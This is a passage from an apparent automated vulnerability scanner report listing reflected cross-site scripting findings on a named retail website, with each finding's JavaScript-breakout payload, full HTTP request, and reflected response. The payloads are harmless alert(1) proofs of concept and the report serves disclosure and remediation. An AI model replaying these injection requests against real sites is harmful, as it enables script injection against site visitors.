Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3ccgtno5td8a3ftph0l9no5fr4; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/");
//]]>
...[SNIP]...

1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3c9"-alert(1)-"a1e63e7882e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vnrisbkf447g71ipgtt5g80lq7; expires=Tue, 09-Nov-2010 17:19:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Garment
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1");
//]]>
...[SNIP]...

1.241. http://www.fredperry.com/sale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db9"-alert(1)-"cbfb29d8f4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /saleb5db9"-alert(1)-"cbfb29d8f4b/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=916ls611rg8chlttk61e4d3rq3; expires=Tue, 09-Nov-2010 17:22:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/saleb5db9"-alert(1)-"cbfb29d8f4b/");
//]]>
...[SNIP]...

1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"b62cca0ff19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale/?62888"-alert(1)-"b62cca0ff19=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rvpr52jaj3fnlthbsvplflfr57; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Sale -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sale/?62888"-alert(1)-"b62cca0ff19=1");
//]]>
...[SNIP]...

1.243. http://www.fredperry.com/shops/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b770"-alert(1)-"c5aafd3c260 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shops5b770"-alert(1)-"c5aafd3c260/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7j4qaa56qrrdappj2bqaoq9jj2; expires=Tue, 09-Nov-2010 17:22:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/shops5b770"-alert(1)-"c5aafd3c260/");
//]]>
...[SNIP]...

1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1313"-alert(1)-"76dcfd4c4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shops/?c1313"-alert(1)-"76dcfd4c4ee=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=til5vppvfl3smgi3hrnqdo48h7; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Our Sho
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/shops/?c1313"-alert(1)-"76dcfd4c4ee=1");
//]]>
...[SNIP]...

1.245. http://www.fredperry.com/site-map/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92156"-alert(1)-"81e165d4a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site-map92156"-alert(1)-"81e165d4a2d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qo6aq5frbvf38upse3suim6k05; expires=Tue, 09-Nov-2010 17:25:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/site-map92156"-alert(1)-"81e165d4a2d/");
//]]>
...[SNIP]...

1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79ccb"-alert(1)-"2a6cc699b53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site-map/?79ccb"-alert(1)-"2a6cc699b53=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=a4invcsiuo08imktuvfah4u0v5; expires=Tue, 09-Nov-2010 17:23:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Site Ma
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/site-map/?79ccb"-alert(1)-"2a6cc699b53=1");
//]]>
...[SNIP]...

1.247. http://www.fredperry.com/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0bde"-alert(1)-"e890c6a858c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womena0bde"-alert(1)-"e890c6a858c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:00:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g3709uchv23iga3tdnoju2fa24; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womena0bde"-alert(1)-"e890c6a858c/");
//]]>
...[SNIP]...

1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa6ee"-alert(1)-"553b47cbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/?aa6ee"-alert(1)-"553b47cbfc3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7uk429dmh07smkjlej1h69bn43; expires=Tue, 09-Nov-2010 17:00:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/?aa6ee"-alert(1)-"553b47cbfc3=1");
//]]>
...[SNIP]...

1.249. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7ca2"-alert(1)-"8d9664b6ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uav4qcl07q89lvv7o5u01co5o4; expires=Tue, 09-Nov-2010 17:04:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/");
//]]>
...[SNIP]...

1.250. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a60ae"-alert(1)-"0aeb64a8199 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5grts2msu40i2sei9s2rh51qq3; expires=Tue, 09-Nov-2010 17:04:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/");
//]]>
...[SNIP]...

1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7af5"-alert(1)-"7367eb33b78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hqde0icrv2qnj40gqcq584nbc3; expires=Tue, 09-Nov-2010 17:04:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1");
//]]>
...[SNIP]...

1.252. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fec6"-alert(1)-"0f7c2574e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mb073il2o1r8resr30jv271527; expires=Tue, 09-Nov-2010 17:10:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/");
//]]>
...[SNIP]...

1.253. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
